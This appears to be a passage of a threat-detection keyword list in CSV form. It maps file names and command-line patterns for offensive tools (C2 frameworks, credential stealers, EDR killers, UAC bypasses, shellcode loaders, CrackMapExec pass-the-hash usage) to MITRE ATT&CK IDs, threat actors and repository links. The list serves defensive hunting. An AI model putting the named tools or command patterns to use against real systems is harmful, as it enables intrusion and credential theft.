TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*\AtomLdr\x64*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,0,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*\attrib.exe* +H *,greyware_tool_keyword,attrib,command aiming to hide a file. 
It can be performed with attrib.exe on a WINDOWS machine with command option +h ,T1562.001,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\AutoSmuggle\*.cs*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*\autotimeline*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*\avetdbg.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*\avred.py*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*\avred.py*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\avredweb.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*\AzureC2Proxy\*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*\AzureC2Relay*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*\AzureHound.ps1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\BabelStrike.py*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names 
written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,0,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*\backdoored\*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*\BackupOperatorToDA*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,0,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*\BadZure*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*\basicKitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*\beacon.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,0,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*\BeaconChannel.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\BeaconConnector.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\BesoToken.cpp*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*\BesoToken.exe*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*\BesoToken.vcxproj*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*\bin\cme.exe*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\bin\shepard\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\BITB-main*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,0,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*\BitTorrent.exe*,greyware_tool_keyword,bittorent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]bittorrent.com/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Blackout.cpp*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.exe*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.sln*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.sys*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.sys*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*\Blackout.vcxproj*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\blindeventlog.exe*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified 
TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*\BloodHound.exe*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*\BloodHoundGui\*.exe*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*\BloodHound-win32-X64*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*\bootkit-rs*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,0,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*\brc.zip*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - 
T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*\BrowserEnum.log*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\Bruteforcer.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*\bypassuac.txt*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*\C2concealer*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*\certipy.pfx*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*\charlotte.cpp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - 
T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*\charlotte.py*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*\chimera.py*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*\Chimera-main\*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*\chisel.exe*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*\chisel-master*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*\Chrome_pass.db*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*\chromium_based_browsers.py*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium 
based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*\CIMplant.exe*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*\CloakNDaggerC2*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,0,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*\cloud_enum.py*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,0,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*\cme.exe* -d * -u * -H *,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\cme.exe* -d * -u * -p *,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\cme.exe* --shares*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\codeloader.exe*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,0,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*\Coercer.py*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*\combine.exe*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense 
Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\combine_gui.exe*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\COM-Hunter.csproj*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*\COM-Hunter.exe*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*\COM-Hunter.sln*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*\common_pass.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\ComunicationC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\Cooolis-ms-Loader\*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
